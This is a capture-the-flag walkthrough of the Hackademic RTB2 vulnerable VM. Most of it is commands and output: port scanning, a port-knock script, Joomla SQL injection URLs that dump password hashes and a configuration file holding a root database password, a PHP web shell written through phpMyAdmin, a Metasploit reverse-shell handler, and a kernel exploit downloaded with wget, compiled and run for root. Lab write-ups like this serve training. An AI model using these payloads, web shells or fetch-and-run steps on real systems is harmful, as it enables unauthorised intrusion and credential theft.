Lab - Hackademic -RTB2

Description

Hackademic RTB2 is the second edition of Hackademic vulnerable Virtual Machine. The first challenge is described here.

Installation

Hackademic RTB2 can be downloaded from following places:

• http://dc97.4shared.com/download/-pIYENTQ/HackademicRTB2.zip
• https://rapidshare.com/files/4089592556/Hackademic.RTB2.zip
• http://download.vulnhub.com/hackademic/Hackademic.RTB2.zip

Environment

• Attacker: 192.168.1.111 (Kali)
• Victim: 192.168.1.100 (VirtualBox)

Should you need to discover the IP address of your target, use tools like fping, netdiscover or nmap.

Discover online hosts with nmap.

nmap -v -sn -d -oA online 192.168.1.1/24root:~ /# grep "Status: Up" online.gnmapHost: 192.168.1.1 ()    Status: UpHost: 192.168.1.100 ()  Status: UpHost: 192.168.1.108 ()  Status: UpHost: 192.168.1.109 ()  Status: UpHost: 192.168.1.187 ()  Status: UpHost: 192.168.1.111 ()  Status: Up

Scan ports with nmap

nmap -v -n -Pn -sS -oA port -sV -p- -iL scanhosts.txt

---

Assessment

Services/Versions

A first nmap scan shows a web server on port 80/tcp and a service on port 666/tcp that looks filtered:

root@kali:~# nmap -v -d -sV -p- 192.168.1.109....Nmap scan report for 192.168.1.109Host is up (0.00048s latency).Not shown: 65533 closed portsPORT    STATE    SERVICE VERSION80/tcp  open     http    Apache httpd 2.2.14 ((Ubuntu))666/tcp filtered doomMAC Address: 08:00:27:26:7E:A8 (Cadmus Computer Systems)....

It shows that port 666/tcp is now opened and hosting a web service. We think of port knowcking. There is also a DNS based service on port 5353/udp.

---

Web service

Let’s analyze what could be interesting on port 80/tcp. Point your browser to the root of the target:

Using wfuzz also discloses the presence of a phpmyadmin interface:

root:~ /# wfuzz -c --hc 404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt http://192.168.1.109/FUZZ/********************************************************* Wfuzz  2.0 - The Web Bruteforcer                     *********************************************************Target: http://192.168.1.109/FUZZ/Payload type: file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txtTotal requests: 87664==================================================================ID      Response   Lines      Word         Chars          Request==================================================================00017:  C=403     10 L        30 W          289 Ch        " - cgi-bin"00074:  C=200   1002 L      4785 W        72044 Ch        " - icons"00204:  C=403     10 L        30 W          285 Ch        " - doc"00525:  C=200     37 L       103 W         1324 Ch        " - #"00524:  C=200     37 L       103 W         1324 Ch        " - index"00528:  C=200     37 L       103 W         1324 Ch        "ered case sensative list, where entries were found"00529:  C=200     37 L       103 W         1324 Ch        " - #"00530:  C=200     37 L       103 W         1324 Ch        " Suite 300, San Francisco, California, 94105, USA."00531:  C=200     37 L       103 W         1324 Ch        " - # on atleast 3 different hosts"00532:  C=200     37 L       103 W         1324 Ch        "d a letter to Creative Commons, 171 Second Street,"00533:  C=200     37 L       103 W         1324 Ch        " - "00534:  C=200     37 L       103 W         1324 Ch        "sit http://creativecommons.org/licenses/by-sa/3.0/"00535:  C=200     37 L       103 W         1324 Ch        "on-Share Alike 3.0 License. To view a copy of this"00536:  C=200     37 L       103 W         1324 Ch        "# This work is licensed under the Creative Commons"00537:  C=200     37 L       103 W         1324 Ch        " - # Copyright 2007 James Fisher"00538:  C=200     37 L       103 W         1324 Ch        " - #"00541:  C=200     37 L       103 W         1324 Ch        " - #"00549:  C=200     37 L       103 W         1324 Ch        " - # directory-list-2.3-small.txt"01064:  C=403     10 L        30 W          292 Ch        " - javascript"01318:  C=200     15 L        30 W          324 Ch        " - check"11356:  C=200    138 L       516 W         8625 Ch        " - phpmyadmin"45597:  C=200     37 L       103 W         1324 Ch        " - "

Find vulnerabilities in the first form

Let’s try to find a vulnerability in the first authentication form. I have used W3AF as well as Sqlmap but have found no SQL injection. Using fuzzing techniques with BurpSuite (Intruder module) against the password field leads to the discovery of an SQL injection.

Notice that it’s a real fuzzing exercise here (I must confess it’s also a little bit by chance) to discover the injection (you will have to use the full list of SQL injection strings from BurpSuite as well as suffixing them with a simple quote. On the other way, the authentication mechanism doesn’t make use of a database. The PHP code will show that the following combination is hard coded:

• login: admin
• password: ’ or 1=1 –’

Anyway, this combination leads to a new message as well as as long encoded string:

<h2>Ok, nice shot...<br></h2>...but, you are looking in a wrong place bro! ;-)<br><br><font color="black">%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A</font color="black">

Decode it with hackbar. and we can get:

3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e

<--------->Knock Knock Knockin' on heaven's door .. :)00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001<--------->

Write double py scripts, one for is decode, the other is for port knock.

Decode KNOCK PORT STRING

>>> binstr = "00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001">>> bins = binstr.split(" ")>>> bins['00110001', '00110000', '00110000', '00110001', '00111010', '00110001', '00110001', '00110000', '00110001', '00111010', '00110001', '00110000', '00110001', '00110001', '00111010', '00110001', '00110000', '00110000', '00110001']>>> bin2str = [chr(int(int(i, 2))) for i in bins]>>> bin2str['1', '0', '0', '1', ':', '1', '1', '0', '1', ':', '1', '0', '1', '1', ':', '1', '0', '0', '1']>>> "".join(bin2str)'1001:1101:1011:1001'

KNOCK PORT

#!/usr/bin/env python# -*- coding: utf8 -*-import sockethost = "192.168.1.109"ports = "1001:1101:1011:1001"csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)for port in ports.split(":"):    print "[*] knock %s port %s" % (host, port)    csock.connect_ex((host, int(port)))csock.close()root:~ /# python knock_door.py[*] knock 192.168.1.109 port 1001[*] knock 192.168.1.109 port 1101[*] knock 192.168.1.109 port 1011[*] knock 192.168.1.109 port 1001root:~ /# ncat -v 192.168.1.109 666Ncat: Version 6.47 ( http://nmap.org/ncat )Ncat: Connected to 192.168.1.109:666.^C

or

knock -v 192.168.1.109 1001 1101 1011 1001

---

Find a vulnerability in the second application

Now, time to find a vulnerability in the second application, the Joomla portal. Let’s try to find a SQL injection. Sqlmap leads to the disclosure of the MySQL users:

We can use joomscan to discovery vulnerabilities.

lab:joomscan/ $ perl joomscan.pl -u "http://192.168.1.109:666/" ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|.  .|'    ||   '|. '|.  .'     |||     ||..  '   ||   || ||      ||   ||  ||  |     |  ||     ''|||.   ||...|' '|.     ||    ||| |||     .''''|.  .     '||  ||       ''|...|'      |   |     .|.  .||. |'....|'  .||.     =================================================================OWASP Joomla! Vulnerability Scanner v0.0.4  (c) Aung Khant, aungkhant]at[yehg.netYGN Ethical Hacker Group, Myanmar, http://yehg.net/labUpdate by: Web-Center, http://web-center.si (2011)=================================================================Vulnerability Entries: 611Last update: February 2, 2012Use "update" option to update the databaseUse "check" option to check the scanner updateUse "download" option to download the scanner latest version packageUse svn co to update the scanner and the databasesvn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan Target: http://192.168.1.109:666Server: Apache/2.2.14 (Ubuntu)X-Powered-By: PHP/5.3.2-1ubuntu4.7## Checking if the target has deployed an Anti-Scanner measure[!] Scanning Passed ..... OK ## Detecting Joomla! based Firewall ...[!] No known firewall detected!## Fingerprinting in progress ...~Generic version family ....... [1.5.x]~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]* Deduced version range is : [1.5.12 - 1.5.14]## Fingerprinting done.## 3 Components Found in front page  ## com_mailto  com_user    com_abc    Vulnerabilities Discovered==========================# 1Info -> Generic: htaccess.txt has not been renamed. Versions Affected: AnyCheck: /htaccess.txtExploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.Vulnerable? Yes# 2Info -> Generic: Unprotected Administrator directory Versions Affected: AnyCheck: /administrator/Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdfVulnerable? N/A# 3Info -> Core: Multiple XSS/CSRF Vulnerability Versions Affected: 1.5.9 <= Check: /?1.5.9-xExploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.  Vulnerable? No# 4Info -> Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1.5.8 <= Check: /?1.5.8-xExploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session. Vulnerable? No# 5Info -> Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <=Check: /?1.5.10-xExploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.Vulnerable? No# 6Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.11 <=Check: /libraries/phpxmlrpc/xmlrpcs.phpExploit: /libraries/phpxmlrpc/xmlrpcs.phpVulnerable? No# 7Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.12 <=Check: /libraries/joomla/utilities/compat/php50x.phpExploit: /libraries/joomla/utilities/compat/php50x.phpVulnerable? No# 8Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions effected: 1.5.11 <=Check: /?1.5.11-x-http_refExploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.Vulnerable? No# 9Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effected: 1.5.11 <=Check: /?1.5.11-x-php-s3lfExploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser. Vulnerable? No# 10Info -> Core: Authentication Bypass Vulnerability Versions effected: Joomla! 1.5.3 <=Check: /administrator/Exploit: Backend accepts any password for custom Super Administrator when LDAP enabledVulnerable? No# 11Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.3 <=Check: /?1.5.3-path-discloseExploit: Crafted URL can disclose absolute pathVulnerable? No# 12Info -> Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <=Check: /?1.5.3-spamExploit: User redirect spamVulnerable? No# 13Info -> Core: joomla.php Remote File Inclusion Vulnerability Versions effected: 1.0.0 Check: /includes/joomla.phpExploit: /includes/joomla.php?includepath=Vulnerable? No# 14Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <=Check: /administrator/Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.Vulnerable? Yes# 15Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.12 <=Check: /libraries/joomla/utilities/compat/php50x.phpExploit: /libraries/joomla/utilities/compat/php50x.phpVulnerable? No# 16Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability Versions effected: Joomla! 1.5.8 <=Check: /plugins/editors/xstandard/attachmentlibrary.phpExploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.phpVulnerable? No# 17Info -> CoreTemplate: ja_purity XSS Vulnerability Versions effected: 1.5.10 <=Check: /templates/ja_purity/Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.Vulnerable? No# 18Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Joomla! 1.5.0 Beta/StableCheck: /libraries/phpmailer/phpmailer.phpExploit: N/AVulnerable? No# 19Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected: Joomla! 1.5.12 Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296Vulnerable? Yes# 20Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability Versions Affected: 1.5.5 <= Check: /components/com_user/controller.phpExploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password Vulnerable? No# 21Info -> CoreComponent: com_content SQL Injection Vulnerability Version Affected: Joomla! 1.0.0 <= Check: /components/com_content/Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--Vulnerable? No# 22Info -> CoreComponent: com_search Remote Code Execution Vulnerability Version Affected: Joomla! 1.5.0 beta 2 <= Check: /components/com_search/Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3BVulnerable? No# 23Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/ACheck: /components/com_mailto/Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1Vulnerable? No# 24Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3Check: /components/com_content/Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28Vulnerable? No# 25Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_content/Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. Vulnerable? No# 26Info -> CoreComponent: com_weblinks XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_weblinks/Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). Vulnerable? No# 27Info -> CoreComponent: com_mailto Email Spam Vulnerability Version Affected: Joomla! 1.5.6 <= Check: /components/com_mailto/Exploit: The mailto component does not verify validity of the URL prior to sending.Vulnerable? No# 28Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1Check: /components/com_content/Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archiveVulnerable? No# 29Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <=Check: /components/com_content/Exploit: A XSS vulnerability exists in the category view of com_content. Vulnerable? No# 30Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability Versions effected: Joomla! 1.5.0 BetaCheck: /components/com_search/Exploit: N/AVulnerable? No# 31Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability Versions effected: 1.0.7 <=Check: /components/com_poll/Exploit: Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>Vulnerable? No# 32Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability Versions effected: N/ACheck: /components/com_banners/Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2Vulnerable? No# 33Info -> CoreComponent: com_mailto timeout Vulnerability Versions effected: 1.5.13 <=Check: /components/com_mailto/Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.Vulnerable? Yes# 34Info -> Component: Amblog SQL Injection Versions Affected: 1.0 Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@versionExploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@versionVulnerable? No# 35Info -> Component: Component com_newsfeeds SQL injection Versions Affected: Any <= Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--Vulnerable? No# 36Info -> Component: ABC Extension com_abc SQL Versions Affected: 1.1.7 <= Check: /index.php?option=com_abc&view=abc&letter=AS&sectionid='Exploit: /index.php?option=com_abc&view=abc&letter=AS&sectionid='Vulnerable? N/A# 37Info -> Component: Joomla Component com_searchlog SQL Injection Versions Affected: 3.1.0 <= Check: /administrator/index.php?option=com_searchlog&act=logExploit: /administrator/index.php?option=com_searchlog&act=logVulnerable? No# 38Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities Versions Affected: 0.9.1 <= Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+Vulnerable? N/AThere are 4 vulnerable points in 38 found entries!~[*] Time Taken: 30 sec~[*] Send bugs, suggestions, contributions to joomscan@yehg.net

SQL Injections as follow:

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=%27http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3

---

Get PHPMYADMIN USERS

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,(SELECT%20GROUP_CONCAT(User,0x7c,password)%20from%20`mysql`.`user`)--%20\&Itemid=3root|*5D3C124406BF85494067182754131FF4DAB9C6C7,root|*5D3C124406BF85494067182754131FF4DAB9C6C7,root|*5D3C124406BF85494067182754131FF4DAB9C6C7,debian-sys-maint|*F36E6519B0B1D62AA2D5346EFAD66D1CAF248996,phpmyadmin|*5D3C124406BF85494067182754131FF4DAB9C6C7

---

Get Joomla Users

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,%28SELECT%20GROUP_CONCAT%28username,0x7c,password%29%20from%20%60joomla%60.%60jos_users%60%29--%20\&Itemid=3Administrator|08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl,JSmith|992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF,BTallor|abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy

---

Get PHPADMIN USER FROM Configuration File

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,load_file(%27/var/www/configuration.php%27)--%20a&Itemid=3<?phpclass JConfig {/* Site Settings */var $offline = '0';var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';var $sitename = 'Hackademic.RTB2';var $editor = 'tinymce';var $list_limit = '20';var $legacy = '0';/* Debug Settings */var $debug = '0';var $debug_lang = '0';/* Database Settings */var $dbtype = 'mysql';var $host = 'localhost';var $user = 'root';var $password = 'yUtJklM97W';var $db = 'joomla';var $dbprefix = 'jos_';/* Server Settings */var $live_site = '';var $secret = 'iFzlVUCg9BBPoUDU';var $gzip = '0';var $error_reporting = '-1';var $helpurl = 'http://help.joomla.org';var $xmlrpc_server = '0';var $ftp_host = '127.0.0.1';var $ftp_port = '21';var $ftp_user = '';var $ftp_pass = '';var $ftp_root = '';var $ftp_enable = '0';var $force_ssl = '0';/* Locale Settings */var $offset = '0';var $offset_user = '0';/* Mail Settings */var $mailer = 'mail';var $mailfrom = 'admin@hackademirtb2.com';var $fromname = 'Hackademic.RTB2';var $sendmail = '/usr/sbin/sendmail';var $smtpauth = '0';var $smtpsecure = 'none';var $smtpport = '25';var $smtpuser = '';var $smtppass = '';var $smtphost = 'localhost';/* Cache Settings */var $caching = '0';var $cachetime = '15';var $cache_handler = 'file';/* Meta Settings */var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';var $MetaKeys = 'joomla, Joomla';var $MetaTitle = '1';var $MetaAuthor = '1';/* SEO Settings */var $sef           = '0';var $sef_rewrite   = '0';var $sef_suffix    = '0';/* Feed Settings */var $feed_limit   = 10;var $feed_email   = 'author';var $log_path = '/var/www/logs';var $tmp_path = '/var/www/tmp';/* Session Setting */var $lifetime = '15';var $session_handler = 'database';}?>

---

Set up a backdoor

Now that we have the password for root, let’s connect to the phpmyadmin interface. Go to http://192.168.1.109/phpmyadmin and use the above credentials.

Open a SQL window and create a rudimentary shell that we will use to download a more sophisticated one:

select "<?php system($_GET[\"cmd\"]); ?>" > into outfile "/var/www/cmd.php"

open http://192.168.1.109:666/cmd.php?cmd=id, we can get:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Please reverse tcp backdoor with php/meterpreter/reverse_tcp (metasploit)

---

Privileges escalation

After some researches on http://www.exploit-db.com, you will find an exploit that works (http://www.exploit-db.com/download/14814).

From your reverse shell, download it, compile it and execute it:

root:~ /# msfconsole ______________________________________________________________________________|                                                                              ||                   METASPLOIT CYBER MISSILE COMMAND V4                        ||______________________________________________________________________________|      \                                  /                      /       \     .                          /                      /            x        \                              /                      /         \                            /          +           /          \            +             /                      /           *                        /                      /                                   /      .               /    X                             /                      /            X                                 /                     ###                                /                     # % #                               /                       ###                      .       /     .                       /      .            *           .                            /                           *                  +                       *                                       ^####      __     __     __          #######         __     __     __        ########    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ##################################################################################################################################################################### WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #################################################################################                                                           http://metasploit.proTrouble managing data? List, sort, group, tag and search your pentest datain Metasploit Pro -- learn more on http://rapid7.com/metasploit       =[ metasploit v4.9.3-2014071601 [core:4.9 api:1.0] ]+ -- --=[ 1330 exploits - 802 auxiliary - 224 post        ]+ -- --=[ 346 payloads - 35 encoders - 8 nops             ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf > use multi/handlermsf exploit(handler) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf exploit(handler) > show optionsModule options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Payload options (php/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST                   yes       The listen address   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Wildcard Targetmsf exploit(handler) > set LHOST 192.168.1.111LHOST => 192.168.1.111msf exploit(handler) > set LPORT 80LPORT => 80msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.111:80[*] Starting the payload handler...[*] Sending stage (40551 bytes) to 192.168.1.109[*] Meterpreter session 1 opened (192.168.1.111:80 -> 192.168.1.109:60094) at 2015-07-11 22:36:34 -0400meterpreter > getuidServer username: www-data (33)meterpreter > sysinfoComputer    : HackademicRTB2OS          : Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686Meterpreter : php/phpmeterpreter > shellProcess 1475 created.Channel 0 created.iduid=33(www-data) gid=33(www-data) groups=33(www-data)python2 -c "import pty;pty.spawn('/bin/bash')"www-data@HackademicRTB2:/var/www$ wget -O 14814.c https://www.exploit-db.com/download/14814<r/www$ wget -O 14814.c https://www.exploit-db.com/download/14814--2015-07-12 05:44:05--  https://www.exploit-db.com/download/14814Resolving www.exploit-db.com... 192.124.249.8Connecting to www.exploit-db.com|192.124.249.8|:443... connected.ERROR: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.To connect to www.exploit-db.com insecurely, use `--no-check-certificate'.www-data@HackademicRTB2:/var/www$ wget --no-check-certificate -O 14814.c https://www.exploit-db.com/download/14814<tificate -O 14814.c https://www.exploit-db.com/download/14814--2015-07-12 05:44:40--  https://www.exploit-db.com/download/14814Resolving www.exploit-db.com... 192.124.249.8Connecting to www.exploit-db.com|192.124.249.8|:443... connected.WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.HTTP request sent, awaiting response... 200 OKLength: unspecified [application/txt]Saving to: `14814.c'    [  <=>                                  ] 15,610      68.0K/s   in 0.2s2015-07-12 05:44:44 (68.0 KB/s) - `14814.c' saved [15610]www-data@HackademicRTB2:/var/www$ gcc -o exploit_priv 14814.cgcc -o exploit_priv 14814.cwww-data@HackademicRTB2:/var/www$ ./exploit_priv./exploit_priv[+] looking for symbols...[+] resolved symbol commit_creds to 0xc016dd80[+] resolved symbol prepare_kernel_cred to 0xc016e0c0[+] setting up exploit payload...[+] creating PF_CAN socket...[+] connecting PF_CAN socket...[+] clearing out any active OPs via RX_DELETE...[+] removing any active user-owned shmids...[+] massaging kmalloc-96 SLUB cache with dummy allocations[+] corrupting BCM OP with truncated allocation via RX_SETUP...[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...[+] mmap'ed mapping of length 328 at 0xb787d000[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...[+] seeking out the smashed shmid_kernel...[+] discovered our smashed shmid_kernel at shmid[104] = 3539052[+] re-smashing the shmid_kernel with exploit payload...[+] launching root shell!root@HackademicRTB2:/var/www# ididuid=0(root) gid=0(root)root@HackademicRTB2:/var/www#

---

Tools

• Nmap
• Wfuzz
• Sqlmap
• Burp Suite
• Joomscan
• Medusa
• Hydra
• Metasploit

---

Sources

check.php

